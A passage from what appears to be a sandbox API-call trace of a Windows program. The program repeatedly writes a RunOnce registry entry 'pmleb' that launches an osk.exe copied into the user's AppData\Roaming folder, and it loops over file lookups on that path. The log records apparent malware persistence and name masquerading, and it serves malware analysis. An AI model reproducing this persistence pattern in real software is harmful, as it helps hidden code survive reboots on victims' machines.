lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.443] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.443] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.444] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.444] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.444] RegCloseKey (hKey=0x280) returned 0x0 [0079.444] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.444] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.444] SetTimer (hWnd=0x20280, nIDEvent=0x203b, uElapse=0xa, lpTimerFunc=0x0) returned 0x203b [0079.444] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.456] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.456] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.456] KillTimer (hWnd=0x20280, uIDEvent=0x203b) returned 1 [0079.457] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.457] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0079.457] IUnknown:Release (This=0x787518) returned 0x1 [0079.457] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.457] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.457] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.457] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.457] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.457] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.457] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.457] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.458] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.458] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3c [0079.458] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.458] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3d [0079.458] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.458] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3c [0079.459] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.459] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.459] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.459] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.459] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.459] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.459] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.459] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.459] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.459] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.459] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.459] RegCloseKey (hKey=0x280) returned 0x0 [0079.459] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.460] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.460] SetTimer (hWnd=0x20280, nIDEvent=0x203c, uElapse=0xa, lpTimerFunc=0x0) returned 0x203c [0079.460] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.472] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.472] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.472] KillTimer (hWnd=0x20280, uIDEvent=0x203c) returned 1 [0079.472] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.472] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.472] IUnknown:Release (This=0x787518) returned 0x1 [0079.472] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.473] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.473] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.473] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.473] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.473] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.473] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.473] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.473] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.473] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3d [0079.473] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.473] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3e [0079.473] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.474] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3d [0079.474] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.474] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.474] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.474] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.474] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.474] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.474] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.474] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.475] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.475] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.475] RegCloseKey (hKey=0x280) returned 0x0 [0079.475] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.475] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.475] SetTimer (hWnd=0x20280, nIDEvent=0x203d, uElapse=0xa, lpTimerFunc=0x0) returned 0x203d [0079.475] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.487] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.487] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.488] KillTimer (hWnd=0x20280, uIDEvent=0x203d) returned 1 [0079.488] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.488] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.488] IUnknown:Release (This=0x787518) returned 0x1 [0079.488] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.488] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.488] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.489] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.489] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.489] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.489] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.489] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.489] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.489] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3e [0079.489] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.489] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3f [0079.489] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
